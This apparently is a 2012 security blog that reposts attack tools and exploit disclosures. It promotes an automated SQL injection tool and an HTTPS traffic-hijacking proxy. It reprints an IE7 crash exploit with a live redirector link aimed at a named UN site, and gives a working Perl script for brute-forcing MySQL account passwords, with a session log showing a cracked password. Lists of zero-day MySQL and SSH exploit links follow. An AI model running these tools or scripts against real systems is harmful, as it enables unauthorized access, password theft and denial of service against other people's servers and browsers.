Dec 7, 2012

jSQL Injection - Java based automated SQL injection tool

An easy to use SQL injection tool to retrieve database informations from a distant server.
jSQL Injection features:
  • GET, POST, header, cookie methods
  • normal, error based, blind, time based algorithms
  • automatic best algorithms detection
  • data retrieving progression
  • proxy setting
  • evasion
  • for now supports MySQL
Download the java executable here, or access the source code for programmers in the Google Git repository. Current tools used for development: w7 eclipse easyphp notepad++ egit.
Next work: speed increase (100% faster, literally), more blind testing, automatic code testing (JUnit) 

Source: http://www.breakthesecurity.com/2012/11/jsqli-sql-injection-tool.html


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Dec 6, 2012

Hyperfox transparently hijacking/proxying HTTP and HTTPs traffic

Installation

Before installing, make sure you have a working Go environment and git.
Check that your PATH and GOPATH variables are correctly set in your .bashrc, .zshrc or .profile file.
$ cat .zshrc
# ... stuff ...
export GOROOT=/usr/lib/go
export GOPATH=$HOME/go
export PATH=$PATH:$GOROOT/bin:$GOPATH/bin
And that pkg, src and bin exist.
$ mkdir -p $GOPATH/src
$ mkdir -p $GOPATH/bin
$ mkdir -p $GOPATH/pkg
Now attempt to install.
% go get github.com/xiam/hyperfox
% hyperfox -h

Usage example

Run hyperfox, it will start in HTTP mode listening at 0.0.0.0:9999 by default.
% hyperfox
If you want to analyze HTTPs instead of HTTP, use the -s flag and provide appropriate cert.pem and key.pem files.
% hyperfox -s -c ssl/cert.pem -k ssl/key.pem
hyperfox won’t be of much use if the host machine has no traffic to analyze or if the only traffic to analyze is its own.

Source: http://reventlov.com/projects/hyperfox
 
If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

DoS vulnerabilities in Internet Explorer 7 (access violation)



-------------------------
Affected products:
-------------------------

Vulnerable are Internet Explorer 7 (7.00.5730.13) and other versions of IE7.
IE6 and IE8 are not affected.

----------
Details:
----------

DoS:

When a redirector with response 301, 302 or 303 and data: URI in Location
header included into a tag frame or iframe, the browser crashes (the attack
doesn't work with other 30x statuses). It happens due to access violation
(aka segmentation fault) in iexplore.exe.

Exploit:

http://websecurity.com.ua/uploads/2012/IE7%20DoS.txt

This is 302 redirector on Perl. You can make similar redirectors with 301,
302 or 303 statuses.

As 301 redirector you can use my example with data: URI at TinyURL:

http://tinyurl.com/fj4hm

The attack works from the second attempt. So it's needed to go to redirector
twice (to set URL twice in address bar, or after appearing of error page to
return to previous page in the browser).

Example of attack with this redirector via vulnerability
(http://websecurity.com.ua/4526/) at United Nations' site (they haven't
fixed it since 29.04.2010, when I've found this hole and informed UN, so you
can use it for checking purposes):

http://www.un.org/zh/documents/view_doc.asp?url=http://tinyurl.com/fj4hm
 
Source:  http://seclists.org/fulldisclosure/2012/Dec/85

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Dec 5, 2012

Interesting Exploit in 2012-12-05[Apache Tomcat]

Apache Tomcat 6.x / 7.x Denial Of Service 
http://packetstormsecurity.org/files/118615

Apache Tomcat Security Bypass
http://packetstormsecurity.org/files/118616

Apache Tomcat CSRF Prevention Filter Bypass 
http://packetstormsecurity.org/files/118617


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Dec 4, 2012

MySQL Local/Remote FAST Account Password Cracking By Kingcope

The attacker logs into the mysql server with an unprivileged account.
There is a command in mysql called change_user, this command can be used
as the name suggests to change a user during a mysql session.
Since mysql is very fast in doing this it is much more powerful to crack
passwords rather than reconnecting every time to the mysql server to
brute force passwords
(what would be VERY slow).
Since the SALT does not change (and this is the weak point) in the
change_user command
it is a convienent way to crack passwords. (When connecting to mysql
in each connection
attempt the SALT is always different and sent out by the server). 
 
use Net::MySQL;

$|=1;

my $mysql = Net::MySQL->new(
 hostname => '192.168.2.3',
 database => 'test',
 user     => "user",
 password => "secret",
 debug => 0,
);

$crackuser = "crackme";

while(<stdin>) {
chomp;
$currentpass = $_;

$vv = join "\0",
                $crackuser,
                "\x14".
                Net::MySQL::Password->scramble(
                        $currentpass, $mysql->{salt}, $mysql->{client_capabilities}
                ) . "\0";
if ($mysql->_execute_command("\x11", $vv) ne undef) {
        print "[*] Cracked! --> $currentpass\n";
        exit;
}
}
---
example session:

C:\Users\kingcope\Desktop>C:\Users\kingcope\Desktop\john179\run\jo
hn --incremental --stdout=5 | perl mysqlcrack.pl
Warning: MaxLen = 8 is too large for the current hash type, reduced to 5
words: 16382  time: 0:00:00:02  w/s: 6262  current: citcH
words: 24573  time: 0:00:00:04  w/s: 4916  current: rap
words: 40956  time: 0:00:00:07  w/s: 5498  current: matc3
words: 49147  time: 0:00:00:09  w/s: 5030  current: 4429
words: 65530  time: 0:00:00:12  w/s: 5354  current: ch141
words: 73721  time: 0:00:00:14  w/s: 5021  current: v3n
words: 90104  time: 0:00:00:17  w/s: 5277  current: pun2
[*] Cracked! --> pass
words: 98295  time: 0:00:00:18  w/s: 5434  current: 43gs
Session aborted
 
Source: http://seclists.org/fulldisclosure/2012/Dec/58 


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Intesting Exploit in 2012-12-04 [Oracle, Web Application]

Oracle MySQL Privilege Escalation 
http://packetstormsecurity.org/files/118552

vBulletin 3.x <= 4.2.0 FAQ (Echo config) bug
http://1337day.com/exploit/19862 

Oracle MySQL 5.5.19-log Denial Of Service
http://packetstormsecurity.org/files/118553

Oracle MySQL Windows Stuxnet Technique SYSTEM Exploit 
http://packetstormsecurity.org/files/118554

Oracle MySQL User Account Enumeration Utility 
http://packetstormsecurity.org/files/118555

RIM BlackBerry PlayBook OS 1.0.8.6067 Local File Access Vulnerability 
http://1337day.com/exploit/19870

vBulletin 4.2.0 Full Path Disclosure Vulnerability
http://1337day.com/exploits/19874

Wordpress 3.4.2 Full Path Disclosure Vulnerability
http://1337day.com/exploits/19876

  
 

 

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Dec 2, 2012

Interesting Exploit 2012-12-02 [MySQL]

MySQL (Linux) Heap Based Overrun PoC Zeroday 

http://1337day.com/exploit/19850

MySQL Denial of Service Zeroday PoC

http://1337day.com/exploit/19851

MySQL (Linux) Database Privilege Elevation Zeroday Exploit

http://1337day.com/exploit/19852

MySQL 5.1/5.5 WiNDOWS REMOTE R00T (mysqljackpot)

http://1337day.com/exploit/19853

MySQL (Linux) Stack Based Buffer Overrun PoC Zeroday

http://1337day.com/exploit/19854

MySQL Remote Preauth User Enumeration Zeroday

http://1337day.com/exploit/19857

SSH.com Communications SSH Tectia Authentication Bypass Remote Zeroday Exploit

http://1337day.com/exploit/19858

MySQL Windows Remote System Level Exploit (Stuxnet technique) 0day

http://1337day.com/exploit/19859




If you like my blog, Please Donate Me
Or Click The Banner For Support Me.
 

Sponsors

lusovps.com

Blogroll

About

 Please subscribe my blog.

 Old Subscribe

Share |